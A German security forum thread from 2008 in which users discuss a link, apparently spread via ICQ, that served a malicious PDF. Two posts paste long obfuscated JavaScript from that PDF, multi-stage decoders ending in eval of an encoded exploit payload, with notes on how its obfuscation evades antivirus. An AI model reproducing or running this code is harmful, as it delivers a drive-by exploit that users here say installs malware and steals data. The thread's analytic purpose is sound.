Infizierte php geöffnet kann einer sich das mal anschauen xD

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von unix, 29. Dezember 2008 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 29. Dezember 2008
    folgendes: ein kollege hat mir nen Link geschickt, mit php zum schluss ich vertrau dem hab drauf geklickt dann kackt langsam der Firefox ab und ich habs gleich kapiert das es ein Angriff ist hab Task Manager ff gekillt, im FF hab ich noch NoScript drinn und Adblock falls des was hilft,

    aber der Firefox lies sich nich gleich abschalten und ich denk mal da sind jetzt einige Daten rübergewandert xD

    Mein Kollege weiß nix davon also ist anscheinend wieder son kack ICQ Virus in Umlauf der sich über ICQ selbst verschickt xD!!!!

    Kennt sich einer damit aus, hab atm kein VM installiert, der sich die Seite und den Quellcode vllt. mal anschauen könnte oder so?

    Ich hoffe ich verstoße nich gegen die Regeln damit wenn ich den Scheiß Link jetzt poste xD

    Spoiler
    DAS IST der verseuchte LINK nichd rauf klicken!!!! ^^
    Code:
    http://vide0portal.com/news/index.php

    Kann mir bitte einer helfen, hab schon mein STEAM PW geändert und weitere findet er mit mspass nich jetzt noch meine gespeicherten PWs in FF.
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Das File existiert nicht mehr. Von daher kann dir wohl auch keiner helfen.
     
  4. #3 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Warscheinlich wieder ein Browserexploit oder ein Webattackingkit wie MPACK und co. ^^
    Meist sind es Public exploits also wenn du immer mit aktueller Software (browser,windows) surfst kann dir nich viel passieren. Gibt natürlich auch Ausnahmen. :)

    Noscript kann dich bei solchen Sachen retten und ist ziemlich paraktisch, da diese kits glaube ich alle java verwenden.
     
  5. #4 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    hhmm ja ich weiß NoScript ist ja für JavaScripts, aber die Seite hat ja die Endung php, also müsste da NoScript eig. nutzlos sein oder?
     
  6. #5 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    hä ?
    bei mir geht die seite ganz normal.
    also es laggt kurz dann ist da eine weiße seite.
    ich bezweifel stark, dass die meine passwörter nun haben
     
  7. #6 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Nunja ich bin mir ja auch nich 100% sicher gewesen, nur nen Link von jemandem zu bekommen der dir aber keinen geschickt hat, der dann auch noch laggt, und wo danach über 20 Viren und Trojaner aufm PC gefunden werden, da denk ich schon das der :poop: ist ^^ und hab auch schon öfters gehört von so kack scripts die einem dann die PWs auslesen.

    Und iwie kann ich mein ebay PW net ändern!

    Ich geb mein altes ein, dann 2x des neue klick auf OK, komm wieder in Mein Ebay raus und nix ist passiert und krieg auch keine mail xD
     
  8. #7 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    also ich als dachte mir nix böses und klick da drauf (eigentlich bin ich ein sehr erfahrener pc-user, und mit opera kann einem nix passieren) und auf einmal hängt sich mein pc auf..


    in der seite ist ein Adobe-Dokument eingebunden dass sich (wenn mans installiert hat) mit dem Adobe-Plugin direkt öffnet.
    Vor einigen Tagen habe ich gelesen, dass es für Adobe Reader ein paar Exploits gibt mit denen man Code ausführen kann o_O

    uff. shit... kann das einer mal in ner sandbox testen und sagen was passiert?
     
  9. #8 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Komisch. Ich bekomme immer nur nen 404. Gut ich hab auch kein Adobe Plugin installiert, da ich foxit reader verwende
     
  10. #9 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    ja genau ^^ so wars bei mir auch!

    Es kam unten in der Statusleiste was von pdf, hab dann aber ff abgeschossen.
    Und jetzt nach dem Virenscan etc. hab ich nen neustart gemacht und was war ^^

    FoxitReader konnte nicht beendet werden.

    Da hab ich dann auch nochmal Glück gehabt das ich den installiert hab anstatt vom Acrobat Reader.
     
  11. #10 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    hier mal ne Google Diagnose

    AsAck
     
  12. #11 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    1. versuch in der vmbox

    http://www.abload.de/img/unbenanntuu2h.png

    2. versuch nach installation von flashplayer und quick time player

    Not Found
    The requested was not found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache
     
  13. #12 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    isn javascript exploit, ich schau mir den mal an ^^

    hier der pdf zufinden:
    Code:
    var Kjk05y="";
    var le3nipQQ9R="";
    function cT5JMLJSBS\( uEuDvngENstn \) {
     var rcgkM = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
     var rK3My5Ahub833, XVuusFDKQgt, UZCfP2zS, eXYfR0mUBd6hX1, rFHrnqWFzJjBw, DUqTH6NV1BBFY, vLy3bF, L7Re7kOIh, CB5fT0 = IAE0PnDZ9BbkRV = 0, fxnehBwPP9 = "", PRn1dPl6vvdsj = [];
     uEuDvngENstn += "";
     do {
     eXYfR0mUBd6hX1 = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     rFHrnqWFzJjBw = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     DUqTH6NV1BBFY = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     vLy3bF = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     L7Re7kOIh = eXYfR0mUBd6hX1<<18 | rFHrnqWFzJjBw<<12 | DUqTH6NV1BBFY<<6 | vLy3bF;
     rK3My5Ahub833 = L7Re7kOIh>>16 & 0xff;
     XVuusFDKQgt = L7Re7kOIh>>8 & 0xff;
     UZCfP2zS = L7Re7kOIh & 0xff;
     if \(DUqTH6NV1BBFY == 64\) {
     PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833\);
     } else if \(vLy3bF == 64\) {
     PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833, XVuusFDKQgt\);
     } else {
     PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833, XVuusFDKQgt, UZCfP2zS\);
     }
     } while \(CB5fT0 < uEuDvngENstn.length\);
     fxnehBwPP9 = PRn1dPl6vvdsj.join\(""\);
     fxnehBwPP9 = Mn5dq4o5D\(fxnehBwPP9\);
     return fxnehBwPP9;
    }
    function Mn5dq4o5D \( rK3My5Ahub833 \) {
     var XVuusFDKQgt = [], UZCfP2zS = eXYfR0mUBd6hX1 = uEuDvngENstn = rFHrnqWFzJjBw = DUqTH6NV1BBFY = 0;
     rK3My5Ahub833 += "";
     while \( UZCfP2zS < rK3My5Ahub833.length \) {
     uEuDvngENstn = rK3My5Ahub833.charCodeAt\(UZCfP2zS\);
     if \(uEuDvngENstn < 128\) {
     XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(uEuDvngENstn\);
     UZCfP2zS++;
     } else if \(\(uEuDvngENstn > 191\) && \(uEuDvngENstn < 224\)\) {
     rFHrnqWFzJjBw = rK3My5Ahub833.charCodeAt\(UZCfP2zS+1\);
     XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(\(\(uEuDvngENstn & 31\) << 6\) | \(rFHrnqWFzJjBw & 63\)\);
     UZCfP2zS += 2;
     } else {
     rFHrnqWFzJjBw = rK3My5Ahub833.charCodeAt\(UZCfP2zS+1\);
     DUqTH6NV1BBFY = rK3My5Ahub833.charCodeAt\(UZCfP2zS+2\);
     XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(\(\(uEuDvngENstn & 15\) << 12\) | \(\(rFHrnqWFzJjBw & 63\) << 6\) | \(DUqTH6NV1BBFY & 63\)\);
     UZCfP2zS += 3;
     }
     }
     return XVuusFDKQgt.join\(""\);
    }
    
    Kjk05y= cT5JMLJSBS\("function pz2tb2LD4TgpF5(zhI1IP3LltH){ return String['fromCharCode'](zhI1IP3LltH);} function lUEzoSQrO8YCQr(L7vCU){ var A823LrvEBZ0=0, kkInLGWjIIhmW=L7vCU.length, Oz8RNF1Zfr=1024, DyCuTQjDjXZz, iHMz4sg, Sn7F37oiy7QwI='', Zj5dSbCSf=A823LrvEBZ0, j2UnuBSmzZ23=A823LrvEBZ0, LkevBaEX1ybdR=A823LrvEBZ0, XttKdvpQp1tbz=Array(63,54,60,55,33,40,42,3,48,38,0,0,0,0,0,0,20,51,24,13,14,5,39,27,37,7,61,45,26,22,4,49,35,47,11,18,9,56,15,12,36,21,31,0,0,0,0,58,0,52,10,2,59,53,50,8,0,32,19,1,6,23,34,29,41,25,62,57,17,43,44,30,46,28,16); for(iHMz4sg=Math.ceil(kkInLGWjIIhmW/Oz8RNF1Zfr);iHMz4sg>A823LrvEBZ0;iHMz4sg--){ for(DyCuTQjDjXZz=Math.min(kkInLGWjIIhmW,Oz8RNF1Zfr);DyCuTQjDjXZz>A823LrvEBZ0;DyCuTQjDjXZz--,kkInLGWjIIhmW--){ LkevBaEX1ybdR|=(XttKdvpQp1tbz[L7vCU.charCodeAt(Zj5dSbCSf++)-48])<<j2UnuBSmzZ23; if(j2UnuBSmzZ23){ Sn7F37oiy7QwI+=pz2tb2LD4TgpF5(198^LkevBaEX1ybdR&255); LkevBaEX1ybdR>>=8; j2UnuBSmzZ23-=2; } else { j2UnuBSmzZ23=6; } } } eval(Sn7F37oiy7QwI); } lUEzoSQrO8YCQr('k9BuZxBuA7q6SDdrAn_5eM_p1D6dXVrvfmQ2eVrvfmQ2eVrvfmQ2eVrv17UiNDrvem02NDrv87Z40VrvrGV40VrvrGQJ3Vrv7cBJeVrv7SQ2eVrv7SgiIDrv7_QJAVrvhcUiEDrvhcgihDrvrjB2hDrvcc527Drv7cUihDrv8R0ihDrv7M04hDrv07g2fVrvfjVieVrv07g2fVrv8VUiOVrv7c5JeVrv7cUiNDrv8R0ihDrvNrQJeVrv8ZQ0OVrv7w043Vrv1IQJeVrv7cUJ3Vrv7cUihDrvIwg28VrvNr0iNDrvOIQ0OVrv8V0J3Vrv1I0i3Vrv7cUJhDrv7cUihDrvIwg28VrvNr0iOVrvEw50OVrv3G02hDrv1IVJcDrv7c5JcDrv7cUihDrvIwg28VrvNr0ieVrv1GQ0OVrv17gJ3Vrv1IQ0hDrv7cBJNDrv7cUihDrvIwg28VrvNrVihDrvaV50OVrv1ZU08Vrv1I02OVrv7cgJ0Vrv7cUihDrvIwg28VrvIcgiNDrvclV2hDrv0ZgJEDrv870JAVrvhl04IDrv7_QJ8Vrv7cUi7DrvNw0ihDrv0Zg28Vrv8RZ4NDrv7SU4IDrv7D50AVrv8RV48VrvhlV4IDrv1IV40Vrv7cg2fVrv7cUihDrvrIV4hDrvhDQi0Vrv07B41VrvOdQJOVrv7cUihDrv870ihDrvhM04IDrvaZg2fVrva7g2EDrv87V4hDrvEcU4IDrv3GQ0OVrv7cUihDrvNcUihDrvIwg2fVrvrVViNDrvNc0icDrvNwg2fVrv1IViOVrv7c507Drv7cUihDrvIwUiEDrvadZ4hDrvNM0ihDrvEw003VrvadQ0IDrv7SU4hDrvrZU0OVrv7cUihDrv0ZUJ1Vrv8RZ4hDrv7M04IDrv7D50AVrv8RV48VrvhlV4IDrvIc5JOVrv7cUihDrvrV0ihDrvNl0irVrvIwUiEDrvcMB4NDrvNMBJfVrv3GV4EDrvEcU0IDrvNMg4hDrvIwg2fVrvrVVieVrvNc0iIDrvNwg2fVrv1IViOVrv7cB4EDrv7cUihDrv7c50AVrv0ZUJ1Vrv8RZ4hDrv7l04IDrv7b50AVrv8RV48VrvhlV4IDrvhc5JOVrv7cUihDrvrV0ihDrv8R0J1VrvhcU4IDrv7D50AVrv8RV48VrvhlV4IDrv7c5JOVrv7cUihDrvIDUihDrvNbg4fVrv1VUiEDrv1VUiEDrv1VUiEDrv1VUiEDrv1mV2EDrvND0iNDrv8RV4EDrv1RBJAVrvNbUJrVrv17UJ1Vrv8RV4IDrv8RQJeVrv7l00aVrvNSV2fVrvNr0ieVrv0mg2fVrv8RQieVrvhw00NDrv7MU0OVrvNr0JEDrv00V2fVrv7MB4hDrvcMUJEDrvIcVJ8Vrvfj047DrvamUiEDrvcMg40Vrv7L0J0VrvhcU23Vrv3R5iAVrv7l00NDrvaZVJ7Drv7MUiaVrvIcUJcDrv3V5JfVrv3ZQifVrv0Zg43VrvNDQJIDrv1RV2fVrvNDV2fVrv7MB4NDrvr0ZJaVrv7MV2fVrv8R04fVrvhMV4AVrvej0iEDrv7Sg2fVrv7Mg2fVrvNwVJIDrvaRg4aVrv7cUiOVrv3j5JOVrv3G0J3VrvNwUJ1VrvIMV4cDrvIL04aVrv7cU43VrvORV2rVrvOGZ2fVrva7BJIDrvO7VJhDrv8RV20VrveGV2AVrv87B21VrvORZ2aVrv8mg23Vrv8mVJ7Drv8Rg2hDrv8VgJhDrvOIV2AVrva7B2eVrv87g2EDrv8RV23VrvOGVJ7DrvOGV2rjrdJGDvFSuscbbJa666zLGnDMQ5@x0v5DLKHw6KP_DsPVuJIL04PVuJIL04X0w08wbK9P_6djQJJ7dpaLD54xV6u1wiT1_FR1_2z96XAnx6PnL5f_L0O__u6D6dcbbJa666zLGnDMQ5@nx6PnL5f_6ril_dcbbJa666zLGnDMQ5@1rrcbbJa666zLGnDMQ5@1VvFSus5xbpaxQinSVK66bX195PeRbH5mdvXMuvarb64_xJ67L5Q3VvFSusebdu4xQinSVK66bX195PeRbH5mdvXMuvarb64_xJ6R55aju66cpKT_BJnST_6Db64buuu7L5Q3Zvxr66P_wKfrL55u_55l6vx1D546QJrcQJ1GQJQmuvQl_rebdu41wKfrL5KP_6XSG08wbK9ZbKax_r5DLv9ZgKaw_Qx0w0i9bKx0bQdGZ0Qfur3jQJ130u21wdQ3dpaSd6orbQGxZKfrL5KIBnKrsnKDVXpbsvdcdpaLwu1VZnTfU4tcUXdjrJa0VsKjr0000000000jwdX0000000X3Ds00000jwdXdQ0rdQ0rdVsKjx0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdVsKjx0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rjwdXdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rjwdXdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdQ0X3DsrdQ0rdQ0rdQ0rdQ0rjwdXdQ0rdQ0rdQ0rdQ0rdQ0rdQ0rdVsKjx0rdQ0rdQ0rdQ0rdQ0rjw0Abdu6nxKarb6fc6dXVx2AGQJ17bs636JAFBnWwBXhDsdJ7_v5M6vQ9b697_HTr0076_48dqvx0xsJLDvFSusu15vm_unSM6sdGD6PlusISRKFrudQ3QsiDR6Hbdupn6s6wg20cgp5_xu8xBvWcT2w_Bi6GxHEcB4trZpjDq2rRBPQGwQ9IuuQ6_59dxu8xBvWcT2w_Bi5u_55l6vxfDJ_Gq4hMBX0m_XjlQ0c1UdJ_bvRlRPzcQFDl5sKQQsxcdnOfgX8dpPk10x9dbvRlRPzcQFDl5sdGxu8xBvWcT2w_Bi5mdvXMuvarb64_xJ6Gq4hMBX0m_XjlQ0c1B_a0w09jd5fDRK5Lxu8xBvWcT2w_BiJGrx97_v5M6vQ9b69dbPwcG2kSqJx0xsJLDvFSusg65JjMdHKlpsdGxJrLZp1m6JHLZpJGDvFSusa6LHSDd2rLs4ARbXglusdGrv5DLKHw6KP_DsPVu2eRZJPVu2eRZJPVu2eRZJPVuJhDg4PVGJeVV4PVR28mU0PVu01jU0PVu01G0JPVdihMZJPVdiaRZJPVdiNcU4PVdirG02PVRihDB4PVRihcgiPVu0NlViPVuihb0iPVdihDgiPVR2fVgiPVdieZgiPVd0hcQ2PVu2a7BJPVd0hcQ2PVR27DB2PVdihLZJPVdihDg4PVR2fVgiPVR40GZJPVR23dZ2PVdi3ZUJPVuJOGZJPVdihw0JPVdihDgiPVd4IcV2PVR40Vg4PVG2OdZ2PVR2AZ0JPVuJOVUJPVdihwViPVdihDgiPVd4IcV2PVR40VB2PVG4I_Z2PVdJ1VViPVuJOjQiPVdihLQiPVdihDgiPVd4IcV2PVR40VBJPVuJ1dZ2PVuJhS0JPVuJOdViPVdihMV4PVdihDgiPVd4IcV2PVR407giPVRJ7_Z2PVuJIrV2PVuJOVZ2PVdihS00PVdihDgiPVd4IcV2PVd4hcg4PVuiO7ViPVd0ISZ4PVR28Z02PVRiOZU4PVdirGV2PVdihDUiPVR43VgiPVd0IcV2PVR2fmg4PVdiNwU4PVdi7_02PVR2fjg2PVRiOjU4PVuJOjU0PVdihcQ2PVdihDgiPVu0OjgiPVRiARU0PVd0hM5JPVG2rGZ2PVdihDgiPVR28VgiPVRieZU4PVRJIcQ2PVRJhcZ4PVR28jgiPVG4hwU4PVdJ1dZ2PVdihDgiPVR4hDgiPVd4IcQ2PVu0A7g4PVR48V5iPVR4IcQ2PVuJO7B2PVdih_0iPVdihDgiPVd4IDB4PVRJrmgiPVR4eVgiPVG4300JPVRJrd04PVdiNwgiPVu0IrZ2PVdihDgiPVd0IwQJPVR2fmgiPVdieZU4PVdi7_02PVR2fjg2PVRiOjU4PVd4hLZ2PVdihDgiPVu0AVgiPVR4OV50PVd4IDB4PVuiEMg4PVR4EMQ2PVdJ1jB4PVG4hr04PVR4ESgiPVd4IcQ2PVu0A7BJPVR48VU4PVR4IcQ2PVuJO7B2PVdihMB4PVdihDgiPVdih_02PVd0IwQJPVR2fmgiPVdiOZU4PVdic_02PVR2fjg2PVRiOjU4PVRihLZ2PVdihDgiPVu0AVgiPVR2fZQJPVRihwU4PVdi7_02PVR2fjg2PVRiOjU4PVdihLZ2PVdihDgiPVd47DgiPVR4cS52PVuJ7DB4PVuJ7DB4PVuJ7DB4PVuJ7DB4PVuJe7Z4PVR4AVg4PVR2fjB4PVuJcM02PVR4cwQ0PVuJhwQJPVR2fjU4PVR2fGZJPVdiO0VJPVR4a7Q2PVR40VBJPVd0EcQ2PVR2fRBJPVRi30V4PVdiErZ2PVR40ZZ4PVd007Q2PVdiEMgiPVuiEwZ4PVd48jV2PVu2aZUiPVRJEDB4PVuiESU0PVdi1Z00PVRihD0JPVdJcbU2PVdiO0V4PVRJ3j0iPVdiEDgJPVd4hwQiPVdJ7LQ2PVdJ3R52PVd0ISUJPVR4AG04PVuJf7Q2PVR4A7Q2PVdiEMg4PVu00mVJPVdie7Q2PVR2fZ52PVRiejU2PVGJaVB4PVdiNcQ2PVdiEcQ2PVR43j04PVRJcSgJPVdihDB2PVdJNLZ2PVdJ1Z0JPVR4IwQJPVd4ej5iPVd41ZgJPVdihwUJPVR20mViPVGJccQ2PVG2ejV2PVR2ElQJPVGJfmQiX0w097dpaLxFfDp0RLT4C9_nTLrr9GQQfGQJ1GQJJGDvFSusvxLnQl6PPMRpHrbPOLrr9ju6YbsvAduHIDQ5znBv5u_55l6vxLDd9jZ097dpaLxHEcB4trZpjDq2rRBP9QQswbdXrQ5HN1B6R95suGxdvxLnQl6PPMRpHrbPO1xJrMQ0Q3Qs8wbK9dbvRlRPzcQFDl5sdGrv5DLKHw6KP_DsPVd010QJPVd010QJX0w09dbvRlRPzcQFDl5sdGx6Ic0QhSb6xdbvRlRPzcQFDl5_9Gq4hMBX0m_XjlQ0c1UdJGDvFSusprZ2SSu6RxBKvLrr9dDnbL0XewqutLr_9GQQfGQJ1GQJQFxFfDp0RLT4C9_nT1Qsi9bK9dDvFSus6MGvN1UQ1rbP0MB4Mldr13Q6elR4CruKQfUQEM5HO6Z60IQXa6_nRMRuJuLKOSBP0LduWrG4ELqvK3rd93usu15vm_unSMLF6MGvN1UQ1rbP0MB4Mld99QQsxcdnOfgX8dpPkLwd9ju6YbsvAduHIDQ5znBvJGrx9QusiDR6Hbdupn6sNb0p@MpdQGwQ97dpaLxH7wqJ8_L5pLrr9Z6K1nDvQDLvPSRXPSGKQ9b65RG6YbRKQnL5x0w09GsimMVvxlL69QQsMDUHe7uu49b_aD6K6wLpP_w_LbB_46DsX0w097dpaLw5tMbiELVnWLrr9P_5OLr4aSdp0_xH7wqJ8_L5pnwpxwbKIbud10x_MDUHe7uu49b_H__paw5vxZ0d6GsimMVvxlL65m6uFSd4f_DJQ0w090b59dxd4lqphM5JgfBF1QpsdQQsrGDUiGxdxILXHcB41PgPow099Q0r9ZQsi7xs4lqphM5JgfBFaQps_GDJQGxx_Lw5tMbiELVnW1sJGLxr9Z0dQGxx_Lxd4lqphM5JgfBF1QpsdQQsOGDUiGw5tMbiELVnW1sJGLxr9Z0d9uux9dw5tMbiELVnW1pJGLxr9I0dQGwQ9dbPwcG2kSqJx0w097dpaLD4AARprrbn9QQsAn_5eM_p1D6dXVrv1m6JHDrv1m6JHSrdJGwvxr66P_D4AARprrbn5u_55l6vxLxr9RQ20VVJQGD4AARprrbn93rr9jU22S6QQnB09RuuQMR_H9666wbpYbG6aD6sdGw4p666FSb_H9666DLpfDU6Fr66Vnb5p_wQeDRpvfQsXjx_uMG52GD4AARprrbndrw09QusdLD4fZbHY_rdJGrx');"\);
    le3nipQQ9R=cT5JMLJSBS\(Kjk05y\);
    eval\(le3nipQQ9R\);
    //ok, hab den code a weng untersucht

    es schaut danach aus als ob via javascript ne binary nachgeladen wird (weiß bis jetz ned genau wie, evt. n buffer overflow oder sowas [wird n array angelegt mit nem index von 1200 + ich denke darin is code])
    diese binary erweitert das script mit nem object namens "util"
    mit dem object kann man, so wies ausschaut, beliebig code ausführen (in dem script wohl ne weitere binary)

    was ich aber mit sicherheit sagen kann is, dass dieser exploit irgendwelche sachen ausließt und per mail vesendet

    is ganz interessant, vielleicht mag N0S mal a weng tiefer graben ^^
    ------
    atm mach ich erstmal nen syscheck, hab keine sandbox benutzt :kotz: (aber zum glück kein adminaxx ;))
     
  14. #13 30. Dezember 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Murdoc dieses 1. Javascript in dem pdf dient nur zum entschlüsseln eines weiteren Javascripts und das 2. Javascript entschlüsselt wieder ein Javascript. Das 3. Javascript ist dann das eigentliche Exploit.
    Wer diese Seite hostet ist sicher kein Anfänger, echt gut gemacht. Interessant ist auch das die Obfuskation des Javascript Codes bei jedem PDF neu erzeugt wird. Das macht es den Antivirenherstellern ziemlich schwer das zu erkennen...
    So sieht das erste Script bei mir aus:

    PHP:
                                     var  ghVLJIEqm5Yq = "" ;
                                    var 
    bcTm3E = "" ;
                                    function 
    VgYbPlrsoUtZB HEn9LnzMIYY  ) {
                                        var 
    zUh0LUEtKr5xLr  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" ;
                                        var 
    bOrGwSfiKY UR71r2VYBq4Pj CoLcfKC yS1e9i VytzFhKrMf4 YWQVe9ULNHTi5 gN2dX YQcq8whUblu rKywSSH  JlYpEdDFGkrs  0 aiJQQn3Ch  "" xVgWivmTneeHN  = [];
                                        
    HEn9LnzMIYY  +=  "" ;
                                        do {
                                            
    yS1e9i  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    VytzFhKrMf4  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    YWQVe9ULNHTi5  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    gN2dX  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    YQcq8whUblu  yS1e9i << 18  VytzFhKrMf4 << 12  YWQVe9ULNHTi5 << gN2dX ;
                                            
    bOrGwSfiKY  YQcq8whUblu >> 16  0xff ;
                                            
    UR71r2VYBq4Pj  YQcq8whUblu >> 0xff ;
                                            
    CoLcfKC  YQcq8whUblu  0xff ;
                                            if (
    YWQVe9ULNHTi5  ==  64 ) {
                                                
    xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY );
                                            } else if (
    gN2dX  ==  64 ) {
                                                
    xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY UR71r2VYBq4Pj );
                                            } else {
                                                
    xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY UR71r2VYBq4Pj CoLcfKC );
                                            }
                                        } while (
    rKywSSH  HEn9LnzMIYY . length );
                                        
    aiJQQn3Ch  xVgWivmTneeHN . join ( "" );
                                        
    aiJQQn3Ch  X3TPUwhKg ( aiJQQn3Ch );
                                        return 
    aiJQQn3Ch ;
                                    }
                                    function 
    X3TPUwhKg  bOrGwSfiKY  ) {
                                        var 
    UR71r2VYBq4Pj  = [],  CoLcfKC  yS1e9i  HEn9LnzMIYY  VytzFhKrMf4  YWQVe9ULNHTi5  0 ;
                                        
    bOrGwSfiKY  +=  "" ;
                                        while ( 
    CoLcfKC  bOrGwSfiKY . length  ) {
                                            
    HEn9LnzMIYY  bOrGwSfiKY . charCodeAt ( CoLcfKC );
                                            if (
    HEn9LnzMIYY  128 ) {
                                                
    UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ( HEn9LnzMIYY );
                                                
    CoLcfKC ++;
                                            } else if ((
    HEn9LnzMIYY  191 ) && ( HEn9LnzMIYY  224 )) {
                                                
    VytzFhKrMf4  bOrGwSfiKY . charCodeAt ( CoLcfKC + 1 );
                                                
    UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ((( HEn9LnzMIYY  31 ) <<  6 ) | ( VytzFhKrMf4  63 ));
                                                
    CoLcfKC  +=  2 ;
                                            } else {
                                                
    VytzFhKrMf4  bOrGwSfiKY . charCodeAt ( CoLcfKC + 1 );
                                                
    YWQVe9ULNHTi5  bOrGwSfiKY . charCodeAt ( CoLcfKC + 2 );
                                                
    UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ((( HEn9LnzMIYY  15 ) <<  12 ) | (( VytzFhKrMf4  63 ) <<  6 ) | ( YWQVe9ULNHTi5  63 ));
                                                
    CoLcfKC  +=  3 ;
                                            }
                                        }
                                        return 
    UR71r2VYBq4Pj . join ( "" );
                                    }

                    
    ghVLJIEqm5Yq VgYbPlrsoUtZB ( "function tXj5UZcm(VUqh4Ydmqb){ return String['fromCharCode'](VUqh4Ydmqb);} function oUzUu6tTpQVJ(nPUPGMM){ var ru9PhHuGAWk=0, btjMOrbnjo=nPUPGMM.length, ln28tvb=1024, m839PScp, CBUW5DsS6UGoIn, mpA1km='', sulEJE=ru9PhHuGAWk, VxqKRN=ru9PhHuGAWk, nGskk9Z4vc0=ru9PhHuGAWk, x0VZtbTeqnth=Array(63,0,2,22,19,38,11,31,20,39,0,0,0,0,0,0,27,54,41,36,47,46,56,28,51,59,30,16,5,62,18,24,34,52,29,1,40,42,12,58,50,37,61,0,0,0,0,4,0,6,49,53,35,23,14,43,21,7,8,44,25,45,3,26,33,32,55,60,48,13,15,17,57,9,10); for(CBUW5DsS6UGoIn=Math.ceil(btjMOrbnjo/ln28tvb);CBUW5DsS6UGoIn>ru9PhHuGAWk;CBUW5DsS6UGoIn--){ for(m839PScp=Math.min(btjMOrbnjo,ln28tvb);m839PScp>ru9PhHuGAWk;m839PScp--,btjMOrbnjo--){ nGskk9Z4vc0|=(x0VZtbTeqnth[nPUPGMM.charCodeAt(sulEJE++)-48])<<VxqKRN; if(VxqKRN){ mpA1km+=tXj5UZcm(56^nGskk9Z4vc0&255); nGskk9Z4vc0>>=8; VxqKRN-=2; } else { VxqKRN=6; } } } eval(mpA1km); } 